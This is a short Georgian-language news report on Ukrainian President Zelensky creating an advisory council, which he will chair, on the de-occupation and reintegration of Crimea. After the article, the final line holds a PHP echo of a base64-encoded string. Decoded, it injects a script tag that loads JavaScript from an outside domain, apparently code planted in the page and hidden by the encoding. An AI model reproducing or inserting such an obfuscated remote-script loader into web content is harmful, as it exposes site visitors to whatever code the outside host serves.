celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ ყირიმის დეოკუპაციისა და რეინტეგრაციის საკითხზე სპეციალური საკონსულტაციო საბჭო შექმნა. ინფორმაციას ადგილობრივი მედია ავრცელებს და წერს, რომ დადგენილების თანახმად, საბჭო უკრაინის ტერიტორიული მთლიანობის აღდგენის საკითხზე იმუშავებს. 
 
"საბჭოს შექმნის მიზანი დეოკუპაციისა და რეინტეგრაციის საკითხზე ღონისძიებების გამართვა, უკრაინის ტერიტორიული მთლიანობის აღდგენა, შედეგების დაძლევა და ზიანის ანაზღაურებაა, რომელიც უკრაინის სახელმწიფომ, მისმა მოქალაქეებმა და იურიდიულმა პირებმა, რუსეთის ოკუპაციისა და შეიარაღებული აგრესიის შედეგად მიიღეს", - წერია დოკუმენტში.
 
ცნობილი ხდება, რომ დადგენილების თანახმად, ზელენსკის ადმინისტრაციის ხელმძღვანელმა, კონსულტაციური საბჭოს პერსონალური შემადგენლობის შესახებ წინადადება 1 თვის განმავლობაში უნდა წარადგინოს. 
 
განკარგულება ძალაში დღეიდან შევიდა. ცნობილია, რომ საკონსულტაციო საბჭოს ხელმძღვანელი პრეზიდენტი ზელენსკი იქნება. 
494
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");